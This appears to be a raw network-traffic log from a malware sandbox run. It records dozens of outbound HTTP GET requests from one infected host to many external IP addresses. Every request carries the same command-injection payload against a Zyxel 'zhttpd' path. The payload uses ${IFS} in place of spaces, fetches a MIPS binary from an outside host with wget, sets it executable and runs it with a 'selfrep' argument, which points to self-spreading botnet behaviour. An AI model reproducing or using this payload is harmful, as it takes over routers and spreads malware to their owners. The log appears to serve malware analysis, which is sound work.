                                            Feb 2, 2024 06:21:13.636189938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4442192.168.2.155128018.173.157.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636239052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4443192.168.2.1534198126.174.8.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636253119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4444192.168.2.154295492.54.51.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636288881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4445192.168.2.1552518118.219.18.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636322021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4446192.168.2.1551962139.175.159.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636360884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4447192.168.2.1549624162.243.47.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636399031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4448192.168.2.1552194105.114.158.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636440992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4449192.168.2.1551366162.244.55.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636466980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4450192.168.2.1534464148.225.47.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636509895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4451192.168.2.153875491.224.242.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636538982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4452192.168.2.1537986164.51.105.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636605978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4453192.168.2.153977296.12.164.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636619091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4454192.168.2.155773889.153.240.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636653900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4455192.168.2.155974680.158.23.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636693001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4456192.168.2.1539058110.237.38.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636738062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4457192.168.2.153756438.241.26.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636779070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4458192.168.2.155616895.56.149.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636809111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4459192.168.2.1560234186.131.156.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636850119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4460192.168.2.1546232125.122.159.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636888981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4461192.168.2.155345419.213.127.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636929989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4462192.168.2.153598877.87.107.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.636969090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4463192.168.2.1551642134.238.188.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637010098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4464192.168.2.153831464.122.114.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637049913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4465192.168.2.1544868122.213.106.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637089014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4466192.168.2.1543122169.192.238.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637131929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4467192.168.2.1553374140.210.224.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637156010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4468192.168.2.1535814205.40.2.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637212038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4469192.168.2.153574491.172.100.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637234926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4470192.168.2.1535416166.120.177.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637278080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4471192.168.2.1559298107.51.240.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637322903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4472192.168.2.154272251.227.47.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637363911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4473192.168.2.1543670114.45.254.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637413979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4474192.168.2.1553884150.223.126.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637455940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4475192.168.2.1534830128.232.55.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637494087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4476192.168.2.1552274179.48.175.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637542963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4477192.168.2.1557916203.159.96.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637559891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4478192.168.2.155057213.70.92.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637625933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4479192.168.2.1559034193.98.89.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637653112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4480192.168.2.155707049.145.227.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637685061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4481192.168.2.1535104131.4.18.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637726068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4482192.168.2.1536746154.124.251.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637784004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4483192.168.2.154780242.182.211.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637816906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4484192.168.2.154311631.20.140.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637856960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4485192.168.2.1533334169.81.110.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637906075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4486192.168.2.1532930209.151.101.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637948990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4487192.168.2.15394722.140.31.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.637974977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4488192.168.2.153555676.172.240.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638045073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4489192.168.2.1549504206.234.218.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638046026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4490192.168.2.1558360112.49.99.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638089895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4491192.168.2.155319082.13.28.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638124943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4492192.168.2.1545064175.19.44.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638176918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4493192.168.2.1541354105.33.246.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638211012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4494192.168.2.1534076101.69.128.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638241053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4495192.168.2.1540612219.230.126.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638283014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4496192.168.2.1538374180.241.1.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638341904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4497192.168.2.153726843.194.66.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638389111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4498192.168.2.1536938204.185.232.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638417006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4499192.168.2.1554236114.217.200.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638478994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4500192.168.2.1537234195.240.137.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638514996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4501192.168.2.153794870.107.55.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638535976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4502192.168.2.15433942.29.226.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638573885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4503192.168.2.155132873.241.229.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638633966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4504192.168.2.154908617.138.215.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:13.638664007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4505192.168.2.1545198157.101.75.98443
                                            TimestampBytes transferredDirectionData
